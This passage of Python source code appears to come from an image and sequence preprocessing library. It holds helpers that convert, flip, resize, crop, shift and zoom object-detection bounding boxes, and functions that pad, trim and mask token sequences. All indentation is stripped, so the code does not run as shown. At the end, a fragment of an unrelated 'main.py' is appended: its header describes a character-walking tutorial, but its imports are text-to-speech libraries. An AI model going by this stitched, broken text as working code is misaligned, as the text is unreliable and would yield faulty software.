# # [[0.15, 0.4, 0.25, 0.5]]
# exit()
def obj_box_coord_centroid_to_upleft_butright(coord, to_int=False):
"""Convert one coordinate [x_center, y_center, w, h] to [x1, y1, x2, y2] in up-left and botton-right format.
Parameters
------------
coord : list of 4 int/float
One coordinate.
to_int : boolean
Whether to convert output as integer.
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
[20, 30, 40, 50]
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
x2 = x + w
y2 = y + h
if to_int:
return [int(x), int(y), int(x2), int(y2)]
else:
return [x, y, x2, y2]
# coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
# tl.logging.info(coord) [20, 30, 40, 50]
# exit()
def obj_box_coord_upleft_butright_to_centroid(coord):
"""Convert one coordinate [x1, y1, x2, y2] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft_butright``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
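    Examples
    ---------
    A small sketch, reversing the example of ``obj_box_coord_centroid_to_upleft_butright``:
    >>> coord = obj_box_coord_upleft_butright_to_centroid([20, 30, 40, 50])
    [30.0, 40.0, 20, 20]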
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x1, y1, x2, y2]")
x1, y1, x2, y2 = coord
w = x2 - x1
h = y2 - y1
x_c = x1 + w / 2.
y_c = y1 + h / 2.
return [x_c, y_c, w, h]
def obj_box_coord_centroid_to_upleft(coord):
"""Convert one coordinate [x_center, y_center, w, h] to [x, y, w, h].
It is the reverse process of ``obj_box_coord_upleft_to_centroid``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
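    Examples
    ---------
    A small sketch using the same box as the centroid examples above:
    >>> coord = obj_box_coord_centroid_to_upleft([30, 40, 20, 20])
    [20.0, 30.0, 20, 20]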
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
return [x, y, w, h]
def obj_box_coord_upleft_to_centroid(coord):
"""Convert one coordinate [x, y, w, h] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x, y, w, h = coord
x_center = x + w / 2.
y_center = y + h / 2.
return [x_center, y_center, w, h]
def parse_darknet_ann_str_to_list(annotations):
"""Input string format of class, x, y, w, h, return list of list format.
Parameters
-----------
annotations : str
        The annotations in darknet format "class x y w h ...." separated by "\\n".
Returns
-------
list of list of 4 numbers
List of bounding box.
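    Examples
    ---------
    A small sketch with hypothetical values:
    >>> ann_str = "0 0.5 0.5 0.2 0.2\\n1 0.1 0.2 0.3 0.4"
    >>> print(parse_darknet_ann_str_to_list(ann_str))
    [[0, 0.5, 0.5, 0.2, 0.2], [1, 0.1, 0.2, 0.3, 0.4]]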
"""
annotations = annotations.split("\n")
ann = []
for a in annotations:
a = a.split()
if len(a) == 5:
for i, _v in enumerate(a):
if i == 0:
a[i] = int(a[i])
else:
a[i] = float(a[i])
ann.append(a)
return ann
def parse_darknet_ann_list_to_cls_box(annotations):
"""Parse darknet annotation format into two lists for class and bounding box.
Input list of [[class, x, y, w, h], ...], return two list of [class ...] and [[x, y, w, h], ...].
Parameters
------------
annotations : list of list
A list of class and bounding boxes of images e.g. [[class, x, y, w, h], ...]
Returns
-------
list of int
List of class labels.
list of list of 4 numbers
List of bounding box.
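    Examples
    ---------
    A small sketch with hypothetical values:
    >>> classes, bboxes = parse_darknet_ann_list_to_cls_box([[0, 0.5, 0.5, 0.2, 0.2], [1, 0.1, 0.2, 0.3, 0.4]])
    >>> print(classes, bboxes)
    [0, 1] [[0.5, 0.5, 0.2, 0.2], [0.1, 0.2, 0.3, 0.4]]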
"""
class_list = []
bbox_list = []
for ann in annotations:
class_list.append(ann[0])
bbox_list.append(ann[1:])
return class_list, bbox_list
def obj_box_horizontal_flip(im, coords=None, is_rescale=False, is_center=False, is_random=False):
"""Left-right flip the image and coordinates for object detection.
Parameters
----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100]) # as an image with shape width=100, height=80
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
>>> print(coords)
[[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
>>> print(coords)
[[0.5, 0.4, 0.3, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
>>> print(coords)
[[80, 40, 30, 30]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
>>> print(coords)
[[50, 40, 30, 30]]
"""
if coords is None:
coords = []
def _flip(im, coords):
im = flip_axis(im, axis=1, is_random=False)
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
if is_center:
# x_center' = 1 - x
x = 1. - coord[0]
else:
# x_center' = 1 - x - w
x = 1. - coord[0] - coord[2]
else:
if is_center:
# x' = im.width - x
x = im.shape[1] - coord[0]
else:
# x' = im.width - x - w
x = im.shape[1] - coord[0] - coord[2]
coords_new.append([x, coord[1], coord[2], coord[3]])
return im, coords_new
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
return _flip(im, coords)
else:
return im, coords
else:
return _flip(im, coords)
obj_box_left_right_flip = obj_box_horizontal_flip
# im = np.zeros([80, 100]) # as an image with shape width=100, height=80
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[0.5, 0.4, 0.3, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[80, 40, 30, 30]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[50, 40, 30, 30]]
# exit()
def obj_box_imresize(im, coords=None, size=None, interp='bicubic', mode=None, is_rescale=False):
"""Resize an image, and compute the new bounding box coordinates.
Parameters
-------------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
size interp and mode : args
See ``tl.prepro.imresize``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1], then return the original coordinates. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
>>> print(coords)
[[40, 80, 60, 60], [20, 40, 40, 40]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
>>> print(coords)
[[20, 20, 30, 15]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
>>> print(coords)
[[30, 30, 45, 22]]
>>> im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
>>> print(coords, im2.shape)
[[0.2, 0.4, 0.3, 0.3]] (160, 200, 3)
"""
if coords is None:
coords = []
if size is None:
size = [100, 100]
imh, imw = im.shape[0:2]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
im = imresize(im, size=size, interp=interp, mode=mode)
if is_rescale is False:
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
# x' = x * (imw'/imw)
x = int(coord[0] * (size[1] / imw))
# y' = y * (imh'/imh)
# tl.logging.info('>>', coord[1], size[0], imh)
y = int(coord[1] * (size[0] / imh))
# w' = w * (imw'/imw)
w = int(coord[2] * (size[1] / imw))
# h' = h * (imh'/imh)
h = int(coord[3] * (size[0] / imh))
coords_new.append([x, y, w, h])
return im, coords_new
else:
return im, coords
# im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
# tl.logging.info(coords)
# # [[40, 80, 60, 60], [20, 40, 40, 40]]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
# tl.logging.info(coords)
# # [20, 20, 30, 15]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
# tl.logging.info(coords)
# # [30, 30, 45, 22]
# im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
# tl.logging.info(coords, im2.shape)
# # [0.2, 0.4, 0.3, 0.3] (160, 200, 3)
# exit()
def obj_box_crop(
im, classes=None, coords=None, wrg=100, hrg=100, is_rescale=False, is_center=False, is_random=False,
thresh_wh=0.02, thresh_wh2=12.
):
"""Randomly or centrally crop an image, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg hrg and is_random : args
See ``tl.prepro.crop``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean, default False
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold: remove the box if the ratio of its width (or height) to the image size is less than the threshold.
    thresh_wh2 : float
        Threshold: remove the box if the ratio of its width to height (or vice versa) is higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
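    Examples
    ---------
    A minimal central-crop sketch (pixel-unit, up-left coordinates; the values are illustrative):
    >>> im = np.zeros([100, 100, 3])
    >>> im_new, classes, coords = obj_box_crop(im, classes=[0], coords=[[30, 40, 20, 20]], wrg=80, hrg=80, is_rescale=False, is_center=False, is_random=False)
    >>> print(classes, coords)
    [0] [[20, 30, 20, 20]]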
"""
if classes is None:
classes = []
if coords is None:
coords = []
h, w = im.shape[0], im.shape[1]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
h_end = hrg + h_offset
w_end = wrg + w_offset
im_new = im[h_offset:h_end, w_offset:w_end]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
im_new = im[h_offset:h_end, w_offset:w_end]
# w
# _____________________________
# | h/w offset |
# | ------- |
# h | | | |
# | | | |
# | ------- |
# | h/w end |
# |___________________________|
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
# x = np.clip( coord[0] - w_offset, 0, w_end - w_offset)
# y = np.clip( coord[1] - h_offset, 0, h_end - h_offset)
# w = np.clip( coord[2] , 0, w_end - w_offset)
# h = np.clip( coord[3] , 0, h_end - h_offset)
x = coord[0] - w_offset
y = coord[1] - h_offset
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_shift(
im, classes=None, coords=None, wrg=0.1, hrg=0.1, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Shift an image randomly or non-randomly, and compute the new bounding box coordinates.
    Objects that end up outside the shifted image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg, hrg row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.shift``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold: remove the box if the ratio of its width (or height) to the image size is less than the threshold.
    thresh_wh2 : float
        Threshold: remove the box if the ratio of its width to height (or vice versa) is higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
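    Examples
    ---------
    A minimal non-random sketch (pixel-unit, up-left coordinates; the values are illustrative):
    >>> im = np.zeros([100, 100, 3])
    >>> im_new, classes, coords = obj_box_shift(im, classes=[0], coords=[[30, 40, 20, 20]], wrg=0.05, hrg=0.1, is_rescale=False, is_center=False, is_random=False)
    >>> print(coords)
    [[25.0, 30.0, 20, 20]]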
"""
if classes is None:
classes = []
if coords is None:
coords = []
imh, imw = im.shape[row_index], im.shape[col_index]
    if (hrg >= 1.0) or (hrg <= 0.) or (wrg >= 1.0) or (wrg <= 0.):
raise AssertionError("shift range should be (0, 1)")
if is_random:
tx = np.random.uniform(-hrg, hrg) * imh
ty = np.random.uniform(-wrg, wrg) * imw
else:
tx, ty = hrg * imh, wrg * imw
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
x = coord[0] - ty # only change this
y = coord[1] - tx # only change this
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_zoom(
im, classes=None, coords=None, zoom_range=(0.9,
1.1), row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
    Objects that end up outside the zoomed image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
zoom_range row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.zoom``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
    thresh_wh : float
        Threshold: remove the box if the ratio of its width (or height) to the image size is less than the threshold.
    thresh_wh2 : float
        Threshold: remove the box if the ratio of its width to height (or vice versa) is higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = im.shape[row_index], im.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
# ======= pixel unit format and upleft, w, h ==========
x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2 # only change this
y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2 # only change this
w = coord[2] / zy # only change this
        h = coord[3] / zx  # only change this
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
# convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def pad_sequences(sequences, maxlen=None, dtype='int32', padding='post', truncating='pre', value=0.):
"""Pads each sequence to the same length:
the length of the longest sequence.
If maxlen is provided, any sequence longer
than maxlen is truncated to maxlen.
Truncation happens off either the beginning (default) or
the end of the sequence.
Supports post-padding and pre-padding (default).
Parameters
----------
sequences : list of list of int
All sequences where each row is a sequence.
maxlen : int
Maximum length.
dtype : numpy.dtype or str
Data type to cast the resulting sequence.
padding : str
Either 'pre' or 'post', pad either before or after each sequence.
    truncating : str
        Either 'pre' or 'post': remove values from sequences longer than maxlen, either at the beginning or at the end of the sequence.
    value : float
        Value used to pad the sequences.
Returns
----------
    x : list of list of numbers
        With dimensions (number_of_sequences, maxlen); the padded numpy array is converted back to a nested list before it is returned.
Examples
----------
>>> sequences = [[1,1,1,1,1],[2,2,2],[3,3]]
>>> sequences = pad_sequences(sequences, maxlen=None, dtype='int32',
... padding='post', truncating='pre', value=0.)
    [[1, 1, 1, 1, 1],
     [2, 2, 2, 0, 0],
     [3, 3, 0, 0, 0]]
"""
lengths = [len(s) for s in sequences]
nb_samples = len(sequences)
if maxlen is None:
maxlen = np.max(lengths)
# take the sample shape from the first non empty sequence
# checking for consistency in the main loop below.
sample_shape = tuple()
for s in sequences:
if len(s) > 0:
sample_shape = np.asarray(s).shape[1:]
break
x = (np.ones((nb_samples, maxlen) + sample_shape) * value).astype(dtype)
for idx, s in enumerate(sequences):
if len(s) == 0:
continue # empty list was found
if truncating == 'pre':
trunc = s[-maxlen:]
elif truncating == 'post':
trunc = s[:maxlen]
else:
raise ValueError('Truncating type "%s" not understood' % truncating)
# check `trunc` has expected shape
trunc = np.asarray(trunc, dtype=dtype)
if trunc.shape[1:] != sample_shape:
raise ValueError(
'Shape of sample %s of sequence at position %s is different from expected shape %s' %
(trunc.shape[1:], idx, sample_shape)
)
if padding == 'post':
x[idx, :len(trunc)] = trunc
elif padding == 'pre':
x[idx, -len(trunc):] = trunc
else:
raise ValueError('Padding type "%s" not understood' % padding)
return x.tolist()
def remove_pad_sequences(sequences, pad_id=0):
"""Remove padding.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
----------
>>> sequences = [[2,3,4,0,0], [5,1,2,3,4,0,0,0], [4,5,0,2,4,0,0,0]]
>>> print(remove_pad_sequences(sequences, pad_id=0))
[[2, 3, 4], [5, 1, 2, 3, 4], [4, 5, 0, 2, 4]]
"""
sequences_out = copy.deepcopy(sequences)
for i, _ in enumerate(sequences):
# for j in range(len(sequences[i])):
# if sequences[i][j] == pad_id:
# sequences_out[i] = sequences_out[i][:j]
# break
for j in range(1, len(sequences[i])):
if sequences[i][-j] != pad_id:
sequences_out[i] = sequences_out[i][0:-j + 1]
break
return sequences_out
def process_sequences(sequences, end_id=0, pad_val=0, is_shorten=True, remain_end_id=False):
"""Set all tokens(ids) after END token to the padding value, and then shorten (option) it to the maximum sequence length in this batch.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The special token for END.
pad_val : int
        Replace the `end_id` and the IDs after `end_id` with this value.
is_shorten : boolean
Shorten the sequences. Default is True.
remain_end_id : boolean
Keep an `end_id` in the end. Default is False.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4, 3, 5, 3, 2, 2, 2, 2], <-- end_id is 2
... [5, 3, 9, 4, 9, 2, 2, 3]] <-- end_id is 2
    >>> sentences_ids = process_sequences(sentences_ids, end_id=vocab.end_id, pad_val=0, is_shorten=True)
[[4, 3, 5, 3, 0], [5, 3, 9, 4, 9]]
"""
max_length = 0
for _, seq in enumerate(sequences):
is_end = False
for i_w, n in enumerate(seq):
            if n == end_id and not is_end:  # first time we see end_id
is_end = True
if max_length < i_w:
max_length = i_w
if remain_end_id is False:
seq[i_w] = pad_val # set end_id to pad_val
            elif is_end:
seq[i_w] = pad_val
if remain_end_id is True:
max_length += 1
if is_shorten:
for i, seq in enumerate(sequences):
sequences[i] = seq[:max_length]
return sequences
def sequences_add_start_id(sequences, start_id=0, remove_last=False):
"""Add special start token(id) in the beginning of each sequence.
Parameters
------------
sequences : list of list of int
All sequences where each row is a sequence.
start_id : int
The start ID.
remove_last : boolean
        Remove the last value of each sequence. Usually used for removing the end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4,3,5,3,2,2,2,2], [5,3,9,4,9,2,2,3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2)
[[2, 4, 3, 5, 3, 2, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2, 3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2, remove_last=True)
[[2, 4, 3, 5, 3, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2]]
For Seq2seq
>>> input = [a, b, c]
>>> target = [x, y, z]
>>> decode_seq = [start_id, a, b] <-- sequences_add_start_id(input, start_id, True)
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
if remove_last:
sequences_out[i] = [start_id] + sequences[i][:-1]
else:
sequences_out[i] = [start_id] + sequences[i]
return sequences_out
def sequences_add_end_id(sequences, end_id=888):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,3],[4,5,6,7]]
>>> print(sequences_add_end_id(sequences, end_id=999))
[[1, 2, 3, 999], [4, 5, 6, 999]]
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
sequences_out[i] = sequences[i] + [end_id]
return sequences_out
def sequences_add_end_id_after_pad(sequences, end_id=888, pad_id=0):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,0,0], [1,2,3,0], [1,2,3,4]]
>>> print(sequences_add_end_id_after_pad(sequences, end_id=99, pad_id=0))
[[1, 2, 99, 0], [1, 2, 3, 99], [1, 2, 3, 4]]
"""
# sequences_out = [[] for _ in range(len(sequences))]#[[]] * len(sequences)
sequences_out = copy.deepcopy(sequences)
# # add a pad to all
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i].append(pad_id)
# # pad -- > end
# max_len = 0
for i, v in enumerate(sequences):
for j, _v2 in enumerate(v):
if sequences[i][j] == pad_id:
sequences_out[i][j] = end_id
# if j > max_len:
# max_len = j
break
# # remove pad if too long
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i] = sequences_out[i][:max_len+1]
return sequences_out
def sequences_get_mask(sequences, pad_val=0):
"""Return mask for sequences.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_val : int
The pad value.
Returns
----------
list of list of int
The mask.
Examples
---------
>>> sentences_ids = [[4, 0, 5, 3, 0, 0],
... [5, 3, 9, 4, 9, 0]]
>>> mask = sequences_get_mask(sentences_ids, pad_val=0)
[[1 1 1 1 0 0]
[1 1 1 1 1 0]]
"""
mask = np.ones_like(sequences)
for i, seq in enumerate(sequences):
for i_w in reversed(range(len(seq))):
if seq[i_w] == pad_val:
mask[i, i_w] = 0
else:
                break  # <-- exit the for loop, process next sequence
return mask
|
main.py
|
#!/usr/bin/env python
# Author: Ryan Myers
# Models: Jeff Styers, Reagan Heller
#
# Last Updated: 2015-03-13
#
# This tutorial provides an example of creating a character
# and having it walk around on uneven terrain, as well
# as implementing a fully rotatable camera.
from gtts import gTTS
from playsound import playsound
import os
global playagain
playagain = True
import random
